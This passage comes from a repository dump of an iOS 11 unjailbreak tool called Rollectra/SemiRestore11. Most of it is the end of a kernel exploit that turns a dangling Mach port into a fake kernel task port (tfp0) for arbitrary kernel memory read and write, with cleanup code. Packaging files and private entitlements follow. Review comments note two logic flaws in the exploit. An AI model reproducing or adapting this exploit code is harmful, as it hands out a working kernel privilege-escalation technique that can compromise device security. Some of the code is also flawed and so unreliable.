    // the third.)

    uint64_t offset = host_port_kaddr & 0xfff;
    uint64_t first_port = 0;
    if ((offset % 0xa8) == 0) {
        printf("host port is on first page\n");
        first_port = host_port_kaddr & ~(0xfff);
    } else if(((offset+0x1000) % 0xa8) == 0) {
        printf("host port is on second page\n");
        first_port = (host_port_kaddr-0x1000) & ~(0xfff);
    } else if(((offset+0x2000) % 0xa8) == 0) {
        printf("host port is on second page\n");
        first_port = (host_port_kaddr-0x2000) & ~(0xfff);
    } else {
        printf("hummm, my assumptions about port allocations are wrong...\n");
    }

    printf("first port is at %016llx\n", first_port);
    uint64_t kernel_vm_map = 0;
    for (int i = 0; i < ports_per_zcram; i++) {
        uint64_t early_port_kaddr = first_port + (i*0xa8);
        uint32_t io_bits = early_rk32(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS));

        if (io_bits != (IO_BITS_ACTIVE | IKOT_TASK)) {
            continue;
        }

        // get that port's kobject:
        uint64_t task_t = early_rk64(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
        if (task_t == 0) {
            printf("weird heap object with NULL kobject\n");
            continue;
        }

        // check the pid via the bsd_info:
        uint64_t bsd_info = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
        if (bsd_info == 0) {
            printf("task doesn't have a bsd info\n");
            continue;
        }
        // NOTE(review): a non-zero pid is only printed, there is no
        // `continue;` - the first active task port in the block with a
        // bsd_info is taken as the kernel task whatever its pid.
        uint32_t pid = early_rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
        if (pid != 0) {
            printf("task isn't the kernel task\n");
        }

        // found the right task, get the vm_map
        kernel_vm_map = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_VM_MAP));
        break;
    }

    if (kernel_vm_map == 0) {
        printf("unable to find the kernel task map\n");
        return;
    }

    printf("kernel map:%016llx\n", kernel_vm_map);

    // find the address of the dangling port:
    // walk task -> itk_space -> is_table and index by the port name's table
    // index (name >> 8), with ipc_entry assumed to be 0x18 bytes
    uint64_t task_kaddr = early_rk64(task_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    uint64_t itk_space = early_rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));
    uint64_t is_table = early_rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));

    const int sizeof_ipc_entry_t = 0x18;
    uint64_t target_port_kaddr = early_rk64(is_table + ((target_port >> 8) * sizeof_ipc_entry_t));

    printf("dangling port kaddr is: %016llx\n", target_port_kaddr);

    // now we have everything to build a fake kernel task port for memory r/w:
    // we know which pipe backs the dangling port (replacer_pipe_index) and
    // where that buffer is (target_port_kaddr), so rewrite it as a task port
    // whose task has the kernel vm_map and the kernel ipc_space

    int target_port_read_fd = read_ends[replacer_pipe_index];
    int target_port_write_fd = write_ends[replacer_pipe_index];

    uint8_t* fake_tfp0_buf = malloc(0xfff);
    read(target_port_read_fd, fake_tfp0_buf, 0xfff);


    build_fake_task_port(fake_tfp0_buf, target_port_kaddr, 0x4242424243434343, kernel_vm_map, ipc_space_kernel, 0x1234);
    write(target_port_write_fd, fake_tfp0_buf, 0xfff);

    mach_port_t fake_tfp0 = target_port;
    printf("hopefully prepared a fake tfp0!\n");

    // test it!
    vm_offset_t data_out = 0;
    mach_msg_type_number_t out_size = 0;
    err = mach_vm_read(fake_tfp0, kernel_vm_map, 0x40, &data_out, &out_size);
    if (err != KERN_SUCCESS) {
        printf("mach_vm_read failed: %x %s\n", err, mach_error_string(err));
        sleep(3);
        exit(EXIT_FAILURE);
    }

    printf("kernel read via second tfp0 port worked?\n");
    printf("0x%016llx\n", *(uint64_t*)data_out);
    printf("0x%016llx\n", *(uint64_t*)(data_out+8));
    printf("0x%016llx\n", *(uint64_t*)(data_out+0x10));
    printf("0x%016llx\n", *(uint64_t*)(data_out+0x18));

    prepare_for_rw_with_fake_tfp0(fake_tfp0);

    // can now use {r,w}k_{32,64}

    // cleanup:

    // clean up the fake canary port entry (the name we received for the port
    // at canary+0xa8 that we never held a real right to): zero its ipc_entry
    // NOTE(review): if fake_canary_port was never found it is MACH_PORT_NULL
    // and this zeroes is_table entry 0 instead.
    wk64(is_table + ((fake_canary_port >> 8) * sizeof_ipc_entry_t), 0);
    wk64(is_table + ((fake_canary_port >> 8) * sizeof_ipc_entry_t) + 8, 0);

    // leak the pipe buffer which replaces the dangling port:
    // (so closing the fds at exit does not free the memory now serving as
    // the fake tfp0's ipc_port)

    printf("going to try to clear up the pipes now\n");

    // finally we have to fix up the pipe's buffer
    // for this we need to find the process fd table:
    // struct proc:
    uint64_t proc_addr = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));

    // struct filedesc
    uint64_t filedesc = rk64(proc_addr + koffset(KSTRUCT_OFFSET_PROC_P_FD));

    // base of ofiles array
    uint64_t ofiles_base = rk64(filedesc + koffset(KSTRUCT_OFFSET_FILEDESC_FD_OFILES));

    uint64_t ofiles_offset = ofiles_base + (target_port_read_fd * 8);

    // struct fileproc
    uint64_t fileproc = rk64(ofiles_offset);

    // struct fileglob
    uint64_t fileglob = rk64(fileproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));

    // struct pipe
    uint64_t pipe = rk64(fileglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));

    // clear the inline struct pipebuf (first three qwords of struct pipe)
    printf("clearing pipebuf: %llx\n", pipe);
    wk64(pipe + 0x00, 0);
    wk64(pipe + 0x08, 0);
    wk64(pipe + 0x10, 0);

    // do the same for the other end:
    ofiles_offset = ofiles_base + (target_port_write_fd * 8);

    // struct fileproc
    fileproc = rk64(ofiles_offset);

    // struct fileglob
    fileglob = rk64(fileproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));

    // struct pipe
    pipe = rk64(fileglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));

    printf("clearing pipebuf: %llx\n", pipe);
    wk64(pipe + 0x00, 0);
    wk64(pipe + 0x08, 0);
    wk64(pipe + 0x10, 0);

    printf("done!\n");

    printf("use the functions in kmem.h to read and write kernel memory\n");
    printf("tfp0 in there will stay alive once this process exits\n");
    printf("keep hold of a send right to it; don't expect this exploit to work again without a reboot\n");
}
#endif /* WANT_CYDIA */

--------------------------------------------------------------------------------
/Rollectra/sploit.h:
--------------------------------------------------------------------------------
#ifndef WANT_CYDIA
#ifndef sploit_h
#define sploit_h

void vfs_sploit(void);

#endif
#endif /* WANT_CYDIA */

--------------------------------------------------------------------------------
/com.pwn20wnd.semirestore11_1.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/com.pwn20wnd.semirestore11_1.1-1_iphoneos-arm.deb
-------------------------------------------------------------------------------- /com.pwn20wnd.semirestore11_1.2-1_iphoneos-arm.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/com.pwn20wnd.semirestore11_1.2-1_iphoneos-arm.deb -------------------------------------------------------------------------------- /entitlements.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.skip-library-validation 8 | 9 | com.apple.private.security.no-container 10 | 11 | com.apple.private.vfs.snapshot 12 | 13 | com.apple.springboard.wipedevice 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /layout/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: com.pwn20wnd.semirestore11 2 | Version: 1.2 3 | Architecture: iphoneos-arm 4 | Description: A full system unjailbreaker that supports all devices running iOS 11. 5 | Maintainer: Pwn20wnd 6 | Depends: cy+cpu.arm64, coreutils-bin, uikittools, rsync, firmware (>= 11.0) 7 | Conflicts: org.coolstar.semirestore11-lite 8 | Replaces: org.coolstar.semirestore11-lite 9 | Section: System 10 | Author: Pwn20wnd 11 | Name: SemiRestore11 / Rollectra 12 | -------------------------------------------------------------------------------- /layout/DEBIAN/postinst: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | uicache 3 | exit 0 4 | 5 | -------------------------------------------------------------------------------- /layout/DEBIAN/postrm: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | uicache 3 | exit 0 4 | 5 | --------------------------------------------------------------------------------